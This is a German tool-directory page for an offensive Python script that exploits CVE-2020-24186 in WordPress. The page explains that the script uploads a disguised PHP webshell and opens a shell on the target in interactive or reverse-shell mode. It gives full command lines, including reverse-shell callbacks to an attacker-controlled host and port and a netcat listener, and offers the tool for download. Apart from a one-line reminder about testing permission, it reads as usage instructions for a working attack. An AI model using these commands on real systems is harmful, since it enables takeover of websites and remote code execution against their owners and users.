Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-24186 | Kitploit
Tools/GitHubGitHub/gazettel/cve-2020-24186
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubgazettel/cve-2020-24186

CVE-2020-24186

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-24186

Dieses Skript nutzt die Schwachstelle CVE-2020-24186 in WordPress aus, um eine getarnte PHP-Nutzlast hochzuladen und eine Shell auf dem Zielsystem zu erhalten. Es gibt drei Betriebsmodi:

  1. Interaktive Shell:
    Lädt die Basis-Webshell hoch und wechselt in einen interaktiven Modus, in dem Sie Befehle über den Parameter cmd senden können.

  2. Manuelle Reverse Shell:
    Lädt die Webshell hoch und sendet die Reverse-Shell-Nutzlast, startet aber keinen automatischen Listener. Sie müssen Ihren eigenen Listener manuell auf der angegebenen IP und dem Port starten.

  3. Reverse Shell mit pwntools:
    Lädt die Webshell hoch, sendet die Reverse-Shell-Nutzlast, und das Skript startet automatisch einen Listener mit pwntools, um die Reverse-Verbindung zu empfangen.

Anforderungen

  • Python 3.x
  • Python-Bibliotheken:
    • requests
    • pwn (pwntools)
  • (Optional) Proxy-Konfiguration, wenn Sie den Datenverkehr umleiten möchten (z. B. für Tests mit Burp Suite).

Verwendungsoptionen

  • --url: Basis-URL der Zielwebsite (z. B. http://10.10.110.119).
  • --blogpath: Pfad zum Beitrag (Standard: /?page=1).
  • --mode: Betriebsmodus, entweder interactive oder reverse.
  • --lhost: Lokale IP für die Reverse Shell (im Reverse-Modus erforderlich).
  • --lport: Lokaler Port für die Reverse Shell (im Reverse-Modus erforderlich).
  • --reverse_method: Reverse-Shell-Methode: bash, nc oder python (Standard ist bash).
  • --manual: Wenn im Reverse-Modus verwendet, startet das Skript keinen Listener; Sie müssen Ihren eigenen Listener manuell starten.
  • --use-proxy: Wenn gesetzt, werden Anfragen über den konfigurierten Proxy gesendet.

Beispiele

1. Interaktive Shell

Laden Sie eine Webshell hoch und starten Sie eine interaktive Sitzung, um Befehle zu senden:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. Reverse Shell im manuellen Modus

Laden Sie die Webshell hoch, senden Sie die Reverse-Shell-Nutzlast, aber starten Sie keinen automatischen Listener. Starten Sie Ihren eigenen Listener manuell (z. B. mit netcat):

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

Starten Sie dann in einem anderen Terminal Ihren Listener manuell:

root@kitploit:~
nc -lvnp 9002

1. Reverse Shell mit pwntools

Laden Sie die Webshell hoch, senden Sie die Reverse-Shell-Nutzlast, und lassen Sie das Skript automatisch einen Listener mit pwntools starten, um die Verbindung zu empfangen:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

Das Skript wartet auf eine Verbindung unter 10.10.1.1:9002 und stellt nach erfolgreicher Verbindung eine interaktive Shell bereit.

Hinweise

  • Stellen Sie sicher, dass die Zielwebsite für CVE-2020-24186 anfällig ist und Sie über die erforderlichen Berechtigungen für Sicherheitstests verfügen.
  • Sie können die PHP-Nutzlast mit der Option --php_payload ändern, falls Anpassungen erforderlich sind.
  • Überprüfen Sie die Proxy-Einstellungen, wenn Sie das Flag --use-proxy verwenden.
Tool herunterladen